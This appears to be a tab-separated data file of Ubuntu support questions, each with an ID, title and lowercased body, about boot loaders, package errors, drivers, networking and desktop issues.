266429	error : file '/grub/i386-pc/normal.mod ' not found	error : file '/grub/i386-pc/normal.mod ' not found . grub rescue > what can i do ? i just sit and stare at it . i found my old netbook ( dell inspiron 1010 ) which i have not used for about four years . i replaced windows xp with ubuntu 12.10 . i used my bootable usb drive . i installed and rebooted . i got the message that normal.mod is not found . what should i do ? type exit , reboot , or quit ? should i re-install ?
266437	pending tasks in puppet dashboard ?	my puppet master dashboard console shows x pending tasks and it keeps on increasing . how do i rectify it ? whenever i change any conf file , it does not get reflected in the dashboard . even if the node gets deleted also it is not reflected in the console ? how to delete the puppet cache ? any suggestions ?
266439	installing ubuntu on hp laptop	i have installed ubuntu on my desktop and is working great there . i also own a hp pavilion g6-2007tx laptop . therefore i decided to do clean install on hp laptop . i contacted hp , they said they dont have drivers for linux os . i suppose that vendor specific drivers can be obtained ( not sure though ) . but i have heard that using ubuntu machine gets heated up and it might cause hardware problems . therefore i am afraid to install . i need suggestions .
266440	how do i install lubuntu 12.04 on a usb drive ( the full installation ) ?	i want to install lubuntu on my 32gb flash drive , but i do n't know how . i know a little bit about partitioning . when i go into gparted , my usb drive comes up as /dev/sdb . i already wiped it completely . there 's no partitions on it at all . i have two questions though : is it safe to have a swap partition on a usb drive ? how many partitions do i need to create , and what type of partition do they need to be ( ext3 , ext4 ) ?
266443	voip on ubuntu for phones	will the new ubuntu phone support voip through the operating system when out of range of the network the user has ? this would be a great way to steal market share from apple which does n't support voip except through complicated apps .
266450	how to fix e : internal error , no file name for libc6	how to fix e : internal error , no file name for libc6 , like that will show if i do : $ sudo apt-get upgrade or $ sudo apt-get install package this is example : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : ginn hplip hplip-data libdrm-dev libdrm-intel1 libdrm-nouveau1a libdrm-radeon1 libdrm2 libgrip0 libhpmud0 libkms1 libsane-hpaio libunity-2d-private0 libunity-core-5.0-5 linux-generic-pae linux-headers-generic-pae linux-image-generic-pae printer-driver-hpcups printer-driver-hpijs unity unity-2d-common unity-2d-panel unity-2d-shell unity-2d-spread unity-common unity-services the following packages will be upgraded : alsa-base firefox firefox-globalmenu firefox-gnome-support firefox-locale-en icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-7-jre-jamvm libdbus-glib-1-2 libdbus-glib-1-dev libgnutls-dev libgnutls-openssl27 libgnutls26 libgnutlsxx27 libssl-dev libssl-doc libssl1.0.0 linux-sound-base openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openjdk-7-jdk openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib openssl sudo 27 upgraded , 0 newly installed , 0 to remove and 26 not upgraded . 3 not fully installed or removed . need to get 0 b/126 mb of archives . after this operation , 3,072 b of additional disk space will be used . do you want to continue [ y/n ] ? y e : internal error , no file name for libc6 i have follow instruction from here e : internal error , no file name for libssl1.0.0 . which do : sudo apt-get update sudo apt-get clean sudo apt-get install -fy sudo dpkg -i /var/cache/apt/archives/*.deb sudo dpkg -- configure -a sudo apt-get install -fy sudo apt-get dist-upgrade but stuck with same error e : internal error , no file name for libc6 when do command sudo apt-get install -fy . and i 've been looking on google , but have not been successful until now . thanks .
266451	connection disconnected every now and then	using ubuntu 12.10 32 bit inside virtualbox ( on mac osx 10.7 ) i am using host only connection between host and guest .. every now and then i keep seeing popups that connection is disconnection .. how can i check logs to see if its some ubuntu issue or virtualbox issue ? thanks !
266454	bad performance in dota2 , amd drivers fault or wine fault ?	tried to play dota 2 through wine and got terrible performance , is it amd drivers fault or generally wine fault ? if it 's amd drives fault , does nvidia have better drivers for linux based systems ? my hardware : 1. i7 3770k . 2 . amd hd6870 . 3 . 8gb of ram . did the above steps on ubuntu 12.10 64bit with default window manager . installed amd drivers through software sources . installed wine1.5 : a . changed wine to work in 32bit mode . b . added d3dx9 , dotnet , dwrite , wininet and vcrun20005/8 through winetricks . installed steam through wine . installed dota 2 . tried to play dota 2 , fps was around 60-70 but the animation was jumpy and generally performance was bad . just for testing i removed fglrx drivers , and stayed with the standard ones , fps in dota 2 was low around 8-15fps , but animation was n't glitchy or jumpy . thanks in advance
266458	dualboot windows 7 and ubuntu 12.04 on uefi unable to boot to ubuntu	here is the layout of my disk : /dev/sda1 ( efi partition ) /dev/sda2 ( recovery partition ) /dev/sda3 /dev/sda4 ( windows 7 partition -- boot ) /dev/sda5 ( /boot ) /dev/sda6 ( swap ) /dev/sda7 ( / ) i have been trying to use windows boot manager to manage the boot between windows 7 and windows 8 . the laptop came with windows 8 ( uefi gpt ) and i installed windows 7 into the partition where windows 8 used to reside . i am pretty sure that it just boots into that partition ( sda4 ) . i then followed this guide to try to get linux to boot from the windows boot manager . however , when i get to the selection menu and i select the ubuntu choice , i get a `` windows failed to start '' error and it asks me to insert the windows repair disc to repair it . if i select the windows choice , it boots into windows 7 just fine . any ideas of how to point the boot to the linux boot to get ubuntu to boot up ? thanks !
266477	ubuntu wubi 12.04 lts wo n't mount	i 'm trying to install ubuntu 12.04 lts alongside windows 7 32-bit as a wubi install , but i get this : an error occurred while mounting /tmp . i can choose to skip mounting or repair manually . i certainly do n't know what to do . could someone help me to fix this ?
266483	how do i change screen resolution in dosbox through wine ?	my old dos game ( tomb raider i ) installs and then runs fine with wine by making use of dosbox . everything works ( keys , audio , full screen ) but i am unable to adjust the resulting screen resolution . the display setting is always at the lowest possible resulting in heavily pixelated output . changing the game settings has no effect . i already tried a better resolution from wine windows configuration , and from changing settings in my ~/.dosbox/dosbox.conf but these seem not to be respected . my system : ubuntu 12.10 amd64 , wine 1.4 , dosbox 0.74 , nvida gforce 6 , nvidia-current-updates 304.51 . how do i make wine to call dosbox with my custom settings for screen resolution and geometry ?
266485	why does this grep command not work ?	when i try to use grep in this fashion : service -- status-all | grep network it still lists all the services even though i piped it into grep to restrict it to the `` network '' string only after the fact : noticed this article that explains why the command behaves this way , that 's what i like about linux , there is always a good reason , but not necessary intuitive
266492	command line ftp download latest files	i am trying to use the command line ftp to download files from a specific date and onwards . is there a simple solution for this ? thank you !
266493	how to allow pptp vpn access through apf firewall	i 'm attempting to connect to a pptp vpn . i have opened ports 47 and 1723 in the ingress rules . when apf is turned on , it fails . when apf is turned off , it works fine . i have turned on as many logging options as i can find , but there is no record of any packets being dropped , other than spam from other machines on the subnet . when apf is turned off , it works fine . i have turned on as many logging options as i can find , but there is no record of any packets being dropped , other than spam from other machines on the subnet . i found a site that said i should add a postrouting rule involving nat , but that had no effect either . solution : add the following line to /etc/apf-firewall/postroute.rules - $ ipt -a input -p 47 -j accept then , run this as root : service apf-firewall restart
266495	how can i fix my wifi on ubuntu 12.10 ?	i am new to ubuntu . i had installed ubuntu 12.10 on my laptop hp compaq presario c707tu for the first time . but my wireless is not working as it is not detecting the available networks . i am able to connect through wire . on the other hand wifi is working properly on windows 7 .
266504	find files and print info	i can easily find files with given string in name : me @ comp : /usr/local/hydra/hydra-7.4.2 $ find -d stat -name `` *hack* '' ./hack881663129.txt ./hack881663129_7.txt ./hack881663129_5.txt ./hack881663129_4.txt ./hack881663129_4_7.txt ./hack881663129_6.txt ./hack881663129_1_6.txt ./hack881663129_8.txt how can i also print file details , like size , date of creation etc . ?
266508	dash / firefox popping up really annoying	ive just done a recent update and dash is now flicking about at the top of the screen permanently mixed with firefox , i can explain it because it is so awful and probably worse than anything in the windows world , its why i use linux to get away form this kind of thing
266509	boot issues with windows 8 and ubuntu 12.10 - bios setup lost !	i got a new laptop ( a vaio s series ) which came with windows 8 . i wanted to install ubuntu 12.10 alongside windows , so i used a ubuntu cd , booted from it and installed ubuntu . installation finished successfully , but then the problems began : after restarting , i encountered issues in terms of choosing which os i wanted to use when starting up . the `` choosing os '' screen was a windows one , and choosing ubuntu worked , but choosing windows did n't . after going through the recovery menu option , i was able to boot windows , but after the next restart i could no longer boot ubuntu and had to reinstall it at that point . i googled around and found out about securestart and uefi . a blog post suggested i should turn off securestart and disable uefi , switching to legacy boot instead . i did that in my bios and reinstalled ubuntu . now ubuntu was fine , but if i tried to choose windows on the `` choose os '' screen ( which was now a ubuntu one ) i got a `` file not found '' error . at this point i ran boot-repair . it ran to completion and on startup there were new windows entries in the `` choose os '' screen as well as the existing ones . but the new windows entries gave me an `` invalid signature error '' . more importantly , boot-repair gave me a warning that my computer is set to legacy and i should probably switch it uefi . but , worryingly , i can no longer get to the bios setup ! on restart/startup even if i press f2 right from the start ( that is the correct key ) , it never goes into bios setup , just straight to the ubuntu `` choose os '' screen . to be honest , i 'm more worried about losing access to the bios setup now than i was about losing access to windows . i hope this makes some sense . boot repair gave me this at the end of its execution : http : //paste.ubuntu.com/5601830 any help you can give me will be gratefully received !
266510	maas enlistment through 12.10 installation cd fails ( sigkill problem )	i have deployed the latest 12.10 ubuntu server maas installation from the cd iso distribution . i have run on the installed node the following commands : sudo maas createsuperuser sudo maas-import-pxe-files sudo apt-get install maas-enlist sudo apt-get install tftpd-hpa sudo maas-import-isos -u when i boot another machine on the same network from cd to install with maas after i choose the maas server i get the following error on screen : sent sigkill to all processes requesting system poweroff the machine shuts down then . this error happens with physical hardware and also with a virtual setup in cloud . i have read all the recommendations in another threads on this topic but nothing helps . could anyone give me a support for this issue ?
266511	how can i create popup windows ?	i have a small script run by cronjobs to synchronize a git repository every 2 hours . the git will be pushed to the server with a constant message . how can i have a popup windows which ask the message before the changes will be committed ? so i will get a popup windows every 2 hours and i just have to enter a short description that what i have modified on the code .
266512	why are my bash script 's arguments causing an error ?	in order to make uploading the code to github easily , i created a sh script # commit.sh git add . git commit -m $ 1 git push origin master but when i run it by saying ./commit.sh `` comment1 comment2 comment3 '' , i get the error of : error : pathspec 'comment2 ' did not match any file ( s ) known to git . error : pathspec 'comment3 ' did not match any file ( s ) known to git . what 's wrong and how do i make it work ?
266514	fix bash_profile to develop ruby on rails apps	i just installed ruby and rails stuff on my machine , and start to learn . but every time i close the terminal and re-open it , i have to re-type the command . ~/.bash_profile in order to run rails commands properly ... how can i fix this , to close and re-open the terminal , ready to develop my rails apps ?
266518	alias adder script in terminal	recently i was adding some command aliases to .bash_aliases file in user home folder . i am wondering if there is some script that i can run to add aliases to that file . what i mean is : some script that first i can add as command alias and after that for example if i run command lets say addalias it will execute the script . the script will do the following job : go to the end of the text file . add line for example : alias aosunpack='/home/elementalfx/aosfirmware/unpack-aos-kernel-g10' then save the file . and finally reload the bash_aliases with command . ~/.bash_aliases but to make it even better script will first ask for alias name and then for a command to execute or file to execute . thats the thing that i dont know how to do . can somebody lead me to the right direction ?
266521	ubuntu 12.04.01 does not identify usb bluetooth	i am trying to use a bluetooth usb , but ubuntu 12.04.01 does not identify it . how to make external usb bluetooth dongle work with ubuntu 12.04.01 . [ edit1 ] results of lsusb
266524	how can i run a single c source code on code : block or in geany ?	i am new in ubuntu . now i am using ubuntu 12.04 ( lts ) . i want to run my c programming code ( .c/.cpp ) . but i dont know how to compile and run code in ubuntu . so i need help . please tell me how can i run single .c code in ubuntu .
266528	pogoplug software installation and a startup error with ubuntu 12.04 on a macbook	first i 've got to say that i am very new to ubuntu and linux but i would love to learn more about it . so this is my first setup . i 'm using an apple macbook from 2008 with ubuntu 12.04 . ( 120gb apple os snowlion , 80gb ubuntu ) when i start my system and i choose to start ubuntu the system boots quite fast . but after one minute or so i get a system error . ubuntu asks me if i would like to send the diagnostic info to their debug center . how can i find out what is wrong ? is that do-able for a linux starter ? in my house i also have a pogoplug device for filesharing . on the website of pogoplug i can find the program needed for installation . when i download the 32bit *.tar.gz and try to open it with ubuntusoftwarecenter i get an error saying that ubuntu software center can not open this file ... how do i fix this . is there a better way to install this third party software ?
266533	gnome terminal transparency with gnome classic ( no effects )	in the terminal preferences there is an option to make it transparent . now , in gnome classic with no effects ( i think there is no compiz ) , this option still exists . however , it is not true transparency : it just shows transparent terminal with wallpaper in the background but if we have any other windows open they will not appear behind the transparent terminal . my question is this : without switching to compiz , is it possible to get true transparency in gnome terminal ? ( enabling compiz slows down my system a little bit which is why i do n't want to use it . ) thanks !
266534	xrandr three screens	i have 2 cards and three screens . i got them working before after a lot of difficulty . the solution was to add a setting to the boot config to increase memory allowed for display . then , i had to do a complete reinstall . after searching for a long time , i found the setting and got three screens working again . i just had to do a reinstall again . now , i 've been searching and searching . i can not find the setting to add to the boot config to increase the amount of memory allowed for display . does anyone happen to know what it is ? perhaps this time i will write it down and try not to lose it .
266540	ubuntu 12.04.02 freezes an ungodly number of times in a day .	i 'm at wit 's end . my computer freezes very , very frequently . i 'm using 12.04 ( 32bit , though my computer supports 64 bit , but i had freezes with that too ) , i 've had the same trouble on 12.10 . i 've used kernels 3.2 , 3.5 and 3.8 , all still have freezing . i 'm not sure how to identify the package causing the freezing , but if anyone has any idea , i will supply whatever info you need . to start , output of lspci . in the middle of typing this , it froze again . it has frozen at least 10 times today . can anyone steer me to the package causing the problem so i can either see if it 's already been reported by someone else , or report a bug myself . when it freezes , the keys do not respond at all , making another tty or using reisub completely impossible . the only thing i can do is a hard reset . i have tried to ssh into my computer from my wife 's , but it is impossible while frozen ( note , it is possible when my computer is not frozen ) . memtest shows no errors . happens in unity 2d and unity 3d , guessing it 's not compiz . my computer is kept dust free , it is not overheating . no proprietary drivers either . tried noapic and nomodeset , to no avail . acpi=off too . : p acpi_apic_instance=2 did not work better either . joe @ sutarmekeg : ~ $ lspci 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 3 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f3 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 03 ) 02:00.0 ethernet controller : marvell technology group ltd. 88e8039 pci-e fast ethernet controller ( rev 14 ) 03:00.0 ethernet controller : atheros communications inc. ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) 08:06.0 cardbus bridge : texas instruments pcixx12 cardbus controller 08:06.1 firewire ( ieee 1394 ) : texas instruments pcixx12 ohci compliant ieee 1394 host controller 08:06.2 mass storage controller : texas instruments 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) 08:06.3 sd host controller : texas instruments pcixx12 sda standard compliant sd host controller an excerpt from syslog mar 11 21:27:14 sutarmekeg aptdaemon : info : quitting due to inactivity mar 11 21:27:14 sutarmekeg aptdaemon : info : quitting was requested mar 11 21:45:34 sutarmekeg kernel : imklog 5.8.6 , log source = /proc/kmsg started . mar 11 21:45:34 sutarmekeg rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 660 '' x-info= '' http : //www.rsyslog.com '' ] start mar 11 21:45:34 sutarmekeg rsyslogd : rsyslogd 's groupid changed to 103 mar 11 21:45:34 sutarmekeg rsyslogd : rsyslogd 's userid changed to 101 mar 11 21:45:34 sutarmekeg rsyslogd-2039 : could not open output pipe '/dev/xconsole ' [ try http : //www.rsyslog.com/e/2039 ] an excerpt from dmesg.0 this looks suspicious , but my googling has not been fruitful . [ 0.000000 ] acpi : bios bug : multiple apic/madt found , using 0 [ 0.000000 ] acpi : if `` acpi_apic_instance=2 '' works better , notify linux-acpi @ vger.kernel.org [ 0.000000 ] acpi : local apic address 0xfee00000
266543	how to get netgear - n150 wireless usb adapter wna1100 working on ubuntu	i do have netgear - n150 wireless usb adapter wna1100 . how can i connect this to ubunto os ? please help me to make it working
266547	ubuntu certified hw test tool	i did not find the software to do some hw test by my own . we made the expirience , that there are many different vendor models arround , which are not on the list actualy , but this means not in general , that those models do not work with ubuntu . so it would be very helpful , if we were able to perform the test yourself thanks herby
266548	webapp shown twice once started	i added a few webapps to my starter panel and if i start one of it the chromium icon appears below of it . chromium itself is locked to the starter separately , that means that once i start the webapp i got 2x chromium icons in my starter ( see screenshot ) can someone tell me if it is possible to disable that the second chromium icon is shown once i 've started a webapp ?
266551	i am looking for software/command to control irda	just like hcitool controls bluetooth , i am looking for command or software ( i prefer to use console so i can make scripts ) to control irda port . is there any software/command that can do it ? thanks
266554	can sdl work on ubuntu touch ?	recently , i 've see the ubuntu touch video here http : //www.youtube.com/watch ? feature=player_embedded & v=cpwhjdlsqtu i want to try to port my own game ( using sdl and ogre ) from pc to ubuntu tablets . however it said that the developing will be based on qt and python . can sdl ( and ogre ) work on it ?
266555	ubuntuone-indicator icon missing in xfce4 bar	i know for a fact that before i upgraded to ubuntu 12.04 from 11 the ubuntuone-indicator icon worked just fine . i upgraded to the new ubuntu and xfce4 instead of gnome and now the icon is a nothing icon for the ubuntuone-indicator app in my bar . it use to be the little cloud icon , now nothing . i have not removed anything from gnome at all , all gnome components are still installed , i just switched to xfce instead . so what gives with this ? any ideas ? i tried a fresh install after purging it , cleaning and autocleaning then install once more . it of course installed to the new location under lib but still no icon .
266556	ca n't package my quickly app after editing	i 've had a lot of problems packaging my quickly app . after some editing i packaged it sucsesfuly , then i : moved the packaging-files ( jotty_0.1_all.deb jotty_0.1.dsc jotty_0.1_i386.changes jotty_0.1.tar.gz ) to another folder . ran quickly license ran quickly package and then i got the following error : sim @ sim : ~/pwq/jottynots/jotty $ quickly package ... ... ... ubuntu packaging created in debian/ ... ... ... ... an error has occurred during package building error : package command failed aborting simon @ simon-dt-u : ~/pwq/jottynots/jotty $ this error is n't the most informative i 've seen , does anybody know what is wrong and how to fix it ? appreciate the help !
266560	is there a prebuilt armel version of quantal-preinstalled-phablet-*.zip for ubuntu touch ?	is there a prebuilt armel version of quantal-preinstalled-phablet-*.zip ? with the armel version , i could port ubuntu touch to some older machines which use armv6 .
266566	ubuntu 12.04 boot disk not being read	i have a copy of ubuntu ( 11.1 and 12.04 ) , both on cd and on usb key , but i am unable to boot from any of them . the cd drive in the machine is fine and will happily read windows and acronis boot disks , but tells me 'disk boot failure , insert system disk and press enter ' . it 's a fairly old machine ( celeron 2.0ghz with 512mb ram ) , but i figure that even if ubuntu does n't run on those sepc 's , the boot disk should at least work ? ! can anyone give me any suggestions as to why this would not work ? thanks .
266568	downloading videos to an external drive with youtube-dl	my hard drive has very little free space left . thus i am trying to get youtube-dl to save the videos onto my external drive . with no luck , so far . has anyone tried that ? or any ideas on how to proceed ? i am new to linux and my interactions with the command prompt can be found below . me @ mycomputer : / $ youtube-dl -o 'media/new volume/youtube downloads ' http : //www.youtube.com/watch ? v=123456789 me @ mycomputer : / $ youtube-dl -o '/media/new\ volume/youtube\ downloads ' http : //www.youtube.com/watch ? v=123456789 i thought that would save the videos on the external drive , but instead the things are getting saved in my home folder under ~/media/new volume/youtube downloads . any help is welcome !
266569	quickly trying different colours in the gimp	currently i 've got the `` change foreground colour '' dialog open and whenever i change the colour i need to click inside the selection to activate the bucket fill . is there a better way ? ; )
266573	installing ubuntu on asus q200e-bhi3t45	can someone give me the step by step info on the correct way to install ubuntu on a asus q200e-bhi3t45 notebook ? that i will not get a ton of errors or ubuntu will run slow ?
266574	problems with partitioning on guid partition table	i installed xubuntu on my new lenovo g580 notebook . when i tried to partition the hdd and it kept making extra 1 mb partitions at the beginning and the end and they looked like unformatted free space . i figured out it was because of the gpt system , so i looked up some things on the net , and managed to change gpt to mbr via live cd and gparted . after i managed to install xubuntu , it would n't boot and kept throwing me back to that hub thing where you can select the device from where you want to boot . it does n't even get to grub , it just throws me back . oh , and since i installed xubuntu , i ca n't enter the bios either . so if i change to gpt , the bios comes back , but then i ca n't install xubuntu , and if i change to mbr , i ca n't boot xubuntu . please help me !
266575	where to install bootloader	new to ubuntu here and am trying to set up 12.04 alongside my windows7 install . i got the iso onto a flash drive , managed to install everything just fine , but when i restart the computer after completing the installation , i have no boot options and windows loads automatically . this makes me think that i installed the bootloader in the wrong place and maybe bios cant find it , but im not sure.. this is an img of my disk partitions from windows . basically ubuntu should go to the 360gb slot on disk1 , but when i tried installing the bootloader in both that partition , and also in the root of that disk , neither were recognized during start-up . im hesitant to try and install it over my main boot ( disk 0 : core ) as this is a ntfs filesystem vs the ext4 that im trying to install ubunt with . basically just looking for the easiest way to get things running without affecting my windows too much . any tips/ advice ? edit : so ive now tried installing the bootloader on /dev/sda ( disk 0 ) where my windows boot is from , ive checked to make sure bios is booting from this disk first , and i still have no boot options to select w7/ub . are there any ways i can diagnose this problem further ? thanks !
266579	gtkentry is editable but not work , ca n't write !	i 'm followed steps this tutorial http : //developer.ubuntu.com/get-started/ but my 'quickly ' have problem when create a gtkentry . i ca n't write any letter , not have focus and when press tab button , not have focus too . i created a new ubuntu-application but not work gktentry too . i do n't understand this problem .
266583	fan speed & temp	when using windows the fan speed and temp works fine , the fan run fast , and temp get higher only when playing a very high graphics games . now on ubuntu , i can hear the fan noise , and i can feel my laptop temp is very high . i use ubuntu 12.04 lts , and i want the fan to work normally -speed up when it needed , but not full speed all time . i have install lm-sensors , but sill have the same problem . i hope that someone can help me . thanks . graphic card ati/amd and no i didnt dectet bec he need root acess to deect 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] i use a dell inspiron 5520 , 6g ram .
266587	ubuntu running extemely slow	i have ubuntu 12.10 installed on my toshiba satellite p20 and it runs extremely slow and jerky with freezing at times . it is running along side windows 7 ultimate and it may have something to do with the graphics card . when upgrading from xp to windows 7 i found out my nvidia graphics card is not compatible with windows7 and it defaults to the standard vga graphics adapter . ubuntu sees the graphics adapter as a vesa : nv34 board-e133-1nz . after the install of ubuntu i could only boot up in recovey mode because the screen would freeze but was fixed by adding nomodeset but it still runs extremely slow and jerky . if you need more info let me know ( i am new at this but very interested and want to learn , thank you for your help ) .
266588	error in installation of gcc on ubuntu ubuntu 12.04	i want to install gcc on a ubuntu machine but got the following errors : t @ lab45 : ~ # apt-get install build-essential reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : build-essential : depends : libc6-dev but it is not going to be installed or libc-dev depends : gcc ( > = 4:4.4.3 ) but it is not going to be installed depends : g++ ( > = 4:4.4.3 ) but it is not going to be installed depends : make but it is not going to be installed depends : dpkg-dev ( > = 1.13.5 ) but it is not going to be installed linux-image-generic-pae : depends : linux-image-3.2.0-37-generic-pae but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . the problem is similar to install gcc on ubuntu 12.04 lts but the solutions there are not workable . how to deal with this ? thanks !
266593	distinguishing partition format types	how can i tell whether a partition is formatted with fat32 or exfat ?
266596	apache2 403 forbidden	i just installed apache2 no my clean ubuntu 12.10 install ( 64-bit ) i installed it , copied the /etc/apache2/sites-available/default to /etc/apache2/sites-available/afflicto here 's the contents of `` afflicto '' site < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /home/afflicto/www < directory / > options followsymlinks allowoverride all < /directory > < directory /home/afflicto/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > and of course , i opened nautilus , navigated to my home directory for the user `` afflicto '' , which is me and created the www folder as well as some html files . then of course i : sudo a2dissite default & & sudo a2ensite afflicto but no.. 403 forbidden i 'm sure this is a simply issue but i 'm not very good at this : p thanks in advance .
266598	wubi install ubuntu key combinations not working	i have installed wubi it is frozen but the key combinations suggested ( https : //wiki.edubuntu.org/wubiguide # how_to_reboot_cleanly_even_when_the_keyboard.2bac8-mouse_are_frozen ) wo n't work . it has frozen before and the combinations have worked but this time they do n't . i am running 12.10 . the computer froze while it was installing a software center app and i had the chrome webstore open , ( in chromium ) their is also a libre office text document open in the background . i have already lost a wubi install by forced shutdown but now i can not afford to corrupt the file system as windows is currently not working ( long story ) . any ideas .
266601	sony vaio-brightness settings not changing	i 've searched for this problem but i cant find a straight answer . if i go into /etc/class/backlight , there 's nothing there . could someone help ? i have the nvidia driver installed , and the fn keys are n't changing the brightness .
266605	update to php 5.4.7	i am currently running php 5.4.6-1ubuntu1.1 ( cli ) ( built : nov 15 2012 01:18:34 ) on xubuntu . i would like to update to latest version or > = 5.4.7 . is there another way to do instead of making it from source ? if source is the only solution can you please guide me how to do it painless . update : i did this : http : //serverfault.com/questions/431805/upgrading-php-from-php-5-3-to-5-4-7 and http : //wiki.helioviewer.org/wiki/compiling_php_from_source_on_ubuntu now from the cli it shows 5.4.12 but from apache it is still 5.4.6 . any ideas how to make apache use the new installation of php ?
266609	problem with downloading software packages through proxy server wifi	i recently installed ubuntu 12.10 , but during installation i ignored update software package.after installing ubuntu successfully now whenever i 'm updating through software updater it is showing failed to download repository information . i 'm having proxy server wifi connection . please help me to overcome the problem . thank you
266611	how to install ktechlab on kubuntu 12.10 64-bits	i try to install ktechlab on my kubuntu 12.10 64-bits . it had a lot of problem . it missed a lot of dependencies . i try to download them , but they still missed alot of other . what is the good faster way to install this application .
266615	ubuntu 12.10 wifi card not activated	i have a dell xps-15 on ubuntu 12.10 with a wifi card intel centrino advanced-n 6235 . i do n't know why but i do n't have access to wifi anymore , my card is detected but i ca n't activate it . here is the output i get for some commands : sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 07 serial : d4 : be : d9:6c : c7:27 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=130.104.228.23 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:46 ioport:2000 ( size=256 ) memory : d2404000-d2404fff memory : d2400000-d2403fff *-network unclaimed description : network controller product : centrino advanced-n 6235 vendor : intel corporation physical id : 0 bus info : pci @ 0000:08:00.0 version : 24 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : d2600000-d2601fff and from iwconfig iwconfig eth0 no wireless extensions . lo no wireless extensions . i do n't know why wlan0 is not shown anymore . when i try to activate it i get the following error message : ifconfig wlan0 up wlan0 : error while getting interface flags : no such device can someone tell me how i can activate my wifi card ? thanks in advance .
266617	connection to pptp server drops continually	i am using ubuntu 12.04 vps to host a pptp server for my own personal use . i have set it up using a script i have written myself which is drawn from various different tutorials i have come across online ( http : //www.markmearns.com/sandbox/pptp.sh ) . the service installs fine and i can connect to it using any windows machine using built-in vpn clients , via my iphone and android tablet . the connection works fine and all traffic is routed over the vpn . it works quickly and never drops out . however , i have invested in a mikrotik routerboard as i want a wifi network that just routes over the vpn . the router connects to the pptp server , but after about 1m20s it disconnects and reconnects . the vpn server also does not exchange any data with the router . the router and its settings are working fine as i can connect to commercial pptp vpn services ( like hidemyass.com ) and the connection works fine and never drops out . this leads to me to believe that the router is not at fault , but my pptp server is the problem . would be grateful if anyone could shed any light on this for me . the configuration is obviously that as seen in the script i have written . mark .
